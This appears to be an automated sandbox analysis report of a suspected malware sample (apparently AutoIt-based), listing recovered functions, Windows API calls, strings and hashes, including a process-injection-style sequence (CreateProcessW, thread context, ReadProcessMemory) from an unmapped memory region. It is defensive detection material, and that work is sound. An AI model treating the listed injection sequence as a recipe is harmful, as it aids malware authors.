Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 743c120e492d5cfa934bc9b72e8beff106ad7f1c21626b643ea4f814a9cc0dcb
Instruction ID: 52aed1bb27c3a0ad338feaf813799e525e31137ed6054e6290667d92a804b56f
Opcode Fuzzy Hash: 743c120e492d5cfa934bc9b72e8beff106ad7f1c21626b643ea4f814a9cc0dcb
Instruction Fuzzy Hash: 77115AB1510208FFDB208FA4DC84EEFB7B8EF01B45B10446AA801D7211E631AE419769

Function 010253B8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01025B73
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01025C09
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01025C2B

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: 78285cfdc6a4167840cfa4b0c5997f4b5581181cc9484faf93f386bf84bb0256
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: F162F930A142589BEB24CFA4CC50BDEB776EF58300F1091A9D64DEB390E7769E81CB59

Function 00463923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004A33A2

Part of subcall function 00466B57: _wcslen.LIBCMT ref: 00466B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00463A04

Strings

Line: , xrefs: 004A33EB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 7241546dd8f4732013f503909fcc369dd1c4bd5288d43e10eaa92acca4cd1e75
Instruction ID: cf63d64a8246a3c5e1f6dd3bf1f08862dd29a5750f9379b9dc9799fb665d98da
Opcode Fuzzy Hash: 7241546dd8f4732013f503909fcc369dd1c4bd5288d43e10eaa92acca4cd1e75
Instruction Fuzzy Hash: C831E4B1408344AAC725EF20DC45BEB77D8AB50719F00492FF49983291FB789A49CBCB

Function 00462DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004A2C8C

Part of subcall function 00463AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00463A97,?,?,00462E7F,?,?,?,00000000), ref: 00463AC2

Part of subcall function 00462DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00462DC4

Strings

X, xrefs: 004A2C5A
`eR, xrefs: 004A2C85

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`eR
API String ID: 779396738-875114340
Opcode ID: 624cc371ee2fb3912d33d2787e7c5a5fa8086b6096936a460de71a9a3b790bd4
Instruction ID: dc8cafc5986bd7b2687a2ea907a32bd34d39ac3e4c02a422666d64ed40c4d22e
Opcode Fuzzy Hash: 624cc371ee2fb3912d33d2787e7c5a5fa8086b6096936a460de71a9a3b790bd4
Instruction Fuzzy Hash: 9221A871A00298AFCF01EF95D9457EE7BF8AF49714F00805EE405A7281EBF859498FA6

Function 0047FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00480668

Part of subcall function 004832A4: RaiseException.KERNEL32(?,?,?,0048068A,?,00531444,?,?,?,?,?,?,0048068A,00461129,00528738,00461129), ref: 00483304

__CxxThrowException@8.LIBVCRUNTIME ref: 00480685

Strings

Unknown exception, xrefs: 00480692

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 30de60453fc5131c3768435ac7e26b13f88e387f45e8a0dc51809d9e89388b9d
Instruction ID: 634f0d10cf452f448a836063fab7fbad649ecd353859ffb3db8c895e6fc43db4
Opcode Fuzzy Hash: 30de60453fc5131c3768435ac7e26b13f88e387f45e8a0dc51809d9e89388b9d
Instruction Fuzzy Hash: 9BF0283090020D77CB10FAB5E846CAE7B6C5E00314B608837B828916D1EF39DA5EC78C

Function 004D3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 004D302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004D3044

Strings

aut, xrefs: 004D3038

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: aed431f22c47780b4edd879634733da542a0ceb9b150189ea5d84aa56aa796a3
Instruction ID: 0c22b43cd127c74b5faacf5e5a348f4ccfb5e6ab39ce963c0576189fc6a77a57
Opcode Fuzzy Hash: aed431f22c47780b4edd879634733da542a0ceb9b150189ea5d84aa56aa796a3
Instruction Fuzzy Hash: 4DD05E72900328A7DA20A7A4AD4EFDB3A6CDB05750F0002A1B655E20D2DAB09984CAD4

Function 004E7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004E82F5
TerminateProcess.KERNEL32(00000000), ref: 004E82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 004E84DD

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: ac2a0077e2bc4f8801cdde4081bf10b003b3022c41cfe202fea20f584ddd956d
Instruction ID: 36f37d847eb03907b249ac69ece30d1b424fe7fb8e8ef91a33c945d9979f5aad
Opcode Fuzzy Hash: ac2a0077e2bc4f8801cdde4081bf10b003b3022c41cfe202fea20f584ddd956d
Instruction Fuzzy Hash: 1E126C719083419FCB14DF29C484B2ABBE5FF84319F04895EE8898B392DB35ED45CB96

Function 004610F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00461BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00461BF4
Part of subcall function 00461BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00461BFC
Part of subcall function 00461BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00461C07
Part of subcall function 00461BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00461C12
Part of subcall function 00461BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00461C1A
Part of subcall function 00461BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00461C22

Part of subcall function 00461B4A: RegisterWindowMessageW.USER32(00000004,?,004612C4), ref: 00461BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0046136A
OleInitialize.OLE32 ref: 00461388
CloseHandle.KERNEL32(00000000,00000000), ref: 004A24AB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: ab24c19e574005c86008d0b0794417b620646e2485683e4d88bd933835770256
Instruction ID: b311b4d732b1b99c21fdc17e02f72ca565e44dbb8a679ba06b01509638129844
Opcode Fuzzy Hash: ab24c19e574005c86008d0b0794417b620646e2485683e4d88bd933835770256
Instruction Fuzzy Hash: 1571ECB5901B048FC784DFBAA9816657BE0FBA8344718862ED00AC7371FB344409EF5D

Function 004CC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00463923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00463A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004CC259
KillTimer.USER32(?,00000001,?,?), ref: 004CC261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004CC270

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 7e83c3d0a7f75b1cbb8fc4feb043ee5d2d86b200c4a57fc3f5f31931ed7d9ada
Instruction ID: 14f2e31eaf659f44b71ad1820f061755137ea9426181279b6832cb5f1f6bcabe
Opcode Fuzzy Hash: 7e83c3d0a7f75b1cbb8fc4feb043ee5d2d86b200c4a57fc3f5f31931ed7d9ada
Instruction Fuzzy Hash: 5931D174900344AFEB729F7488D5BEBBBEC9B02308F0404DED19E93241C7785A89CB5A

Function 004986AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,004985CC,?,00528CC8,0000000C), ref: 00498704
GetLastError.KERNEL32(?,004985CC,?,00528CC8,0000000C), ref: 0049870E
__dosmaperr.LIBCMT ref: 00498739

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 9e1ecf6e594a45fc5513bc9e69674e9f85bc505b66d5267ba701f8e39b9b0790
Instruction ID: 1be7d6918f26a2a06a360c3046e923ac9548ec53453ae8737013f798659fc8fb
Opcode Fuzzy Hash: 9e1ecf6e594a45fc5513bc9e69674e9f85bc505b66d5267ba701f8e39b9b0790
Instruction Fuzzy Hash: BF014432A0422026CE316238A845B7F2F594B93778F39017FEC048F2D2DEAC8C81C29C

Function 0046DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0046DB7B
DispatchMessageW.USER32(?), ref: 0046DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0046DB9F
Sleep.KERNEL32(0000000A), ref: 0046DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 004B1CC9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 29a90be41d6aa6798845dd4596140251881e058c0a1f33bc60dee0db5c411a48
Instruction ID: ed94b1c4399d631003817c4e891bcde361028ed8abed204610b13d0e9eab0f0b
Opcode Fuzzy Hash: 29a90be41d6aa6798845dd4596140251881e058c0a1f33bc60dee0db5c411a48
Instruction Fuzzy Hash: 3DF05430A043459BE730D7718D99FEB77B8EB44710F50492AE619831D0EB34A449CB2E

Function 004D2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,004D2CD4,?,?,?,00000004,00000001), ref: 004D2FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004D2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004D3006
CloseHandle.KERNEL32(00000000,?,004D2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004D300D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 4bf275280259574b88792c12485f8eb82f732532782a65ed799cf0a964d82342
Instruction ID: e507e09107ae7190bf52a654a377192df9b15f419fa73ed15abe343095e6bfb5
Opcode Fuzzy Hash: 4bf275280259574b88792c12485f8eb82f732532782a65ed799cf0a964d82342
Instruction Fuzzy Hash: DEE0863228021477D2311755BD4DF9B3A5CD786B71F114221FB19B51D046A01921D6AC

Function 00471310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004717F6

Strings

CALL, xrefs: 004717C6

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 44de3e52fe6c9ec132f6de897527fb51ccde8a619ddb55fa896298bc46fcfcd7
Instruction ID: 6d7abc567ff66a0340015a4f0603b070b8bb5dae5d35625d7d0e548a5e7225f7
Opcode Fuzzy Hash: 44de3e52fe6c9ec132f6de897527fb51ccde8a619ddb55fa896298bc46fcfcd7
Instruction Fuzzy Hash: E7229E706083019FC714DF19C490BAABBF1BF85318F14891EF49A8B361D739E955CB9A

Function 004D6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004D6F6B

Part of subcall function 00464ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 004D6F5A, 004D6F63

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: af5ede8f9238cd500b2cbeee5ee67366c62a33b2b5ae95bab9aa2553a9983dd2
Instruction ID: 9850c64d874d96040a39f2edf08590f9e180c0b41c6f7e1d56ebf8c39a8db8e5
Opcode Fuzzy Hash: af5ede8f9238cd500b2cbeee5ee67366c62a33b2b5ae95bab9aa2553a9983dd2
Instruction Fuzzy Hash: 0FB18F311086019FCB14EF21C49196EB7E5AF94308F14895FF496973A2EB38ED49CB9A

Function 00463837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00463908

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 51438525bcc47376919e83be5c3316365367489fec148f1032591a028bfa9199
Instruction ID: be62bef24dcd58e9cad4aa064e653421c8a76dd7a8e28801e1d2ecae247ac1da
Opcode Fuzzy Hash: 51438525bcc47376919e83be5c3316365367489fec148f1032591a028bfa9199
Instruction Fuzzy Hash: 5F317CB05047419FD720EF75D88479BBBE8FB59709F00092EF99A83340E775AA48CB5A

Function 010253B5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01025B73
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01025C09
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01025C2B

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: a6d16a6a36207265dc9db3f3431c7a9685f173971421c26182f368538e21a80f
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: DF12DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9D10DEB7A5E77A4E81CF5A

Function 0047FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0047FD1F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 30bd9582696168af34be597faba829b321cddc5300a5222b35081d726f0c9d51
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: CE31F174A001099FD729CF59D4809AAFBA2FB49300B24C6A6E80ACB752D735EDC5CBC5

Function 00464ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00464E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00464EDD,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464E9C
Part of subcall function 00464E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00464EAE
Part of subcall function 00464E90: FreeLibrary.KERNEL32(00000000,?,?,00464EDD,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464EFD

Part of subcall function 00464E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004A3CDE,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464E62
Part of subcall function 00464E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00464E74
Part of subcall function 00464E59: FreeLibrary.KERNEL32(00000000,?,?,004A3CDE,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464E87

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: f6211c0e390b59c206f13e788d691780bb6dbc95fc779df32211aceff8bd0e9d
Instruction ID: 8641b2683fff9e9b6aef4c7d8d9664a761792886b0b5bdebfb0fd98f822aaefb
Opcode Fuzzy Hash: f6211c0e390b59c206f13e788d691780bb6dbc95fc779df32211aceff8bd0e9d
Instruction Fuzzy Hash: 40112B32600305AACF15BF61DC02FAD77A49F90714F10842FF542A61C1FE799E059799

Function 00498402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00498440

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
